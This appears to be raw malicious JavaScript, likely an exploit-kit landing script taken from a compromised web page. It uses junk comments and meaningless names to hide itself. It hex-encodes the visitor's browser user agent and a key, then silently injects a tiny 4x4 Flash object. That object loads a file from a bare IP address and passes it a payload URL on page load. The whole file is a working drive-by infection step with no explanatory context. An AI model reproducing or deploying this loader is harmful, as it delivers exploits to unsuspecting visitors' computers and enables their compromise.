/*s43888d34775hssfj93242fs*/function hgfgerdfgdf(num, width){/*s84997d5290hfj33606fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s74434d47588hfj93540fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s64710d6771hfj46873fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s37190d34614hfj35226fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd1448hfs*/c += b + d;/*s22781d46487hfj45974fs*/e += 1;}return c;}/*s40439dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.124.165/?NjQ4MDA0Nzg=&newest=xXzQMvWdbRXQC53EKvncT6NHMVHRHECL2YydmrHTefjaeVWkzrLFTF_xozKASASG6_FtdfJSDV&information=MTI4OTQwNjQ=&round=DijEzVewdknYZfBg4S9vqpjEDUz0Cdg5fU_xKPMAtC-MeUR7Uy2gz9zrAkc8glwBGL6FETi-tL&around=MTM1MDU1ODQ=", ghnvbn("http://92.53.124.165/?Njk3OTM3NzE=&round=yn49UB1gT8qivhkOBnRed05aF_xSMZwsT_JOVQrA82l-kyLMTJcl0wxSLuGBYzegtVVsX6AgRnq_7S6CJrg&newest=xHzQMrDYbR7FFYDfKPnEUKREMU3WA0SKwY-ZhazVF5-xFDTGpbH1FxzspVydCFyEmvFvdLMHIwGh1UTASwc&information=MjE3NDMwMDg=&travel=MzMzNjI4MzQ=","gexywoaxor"));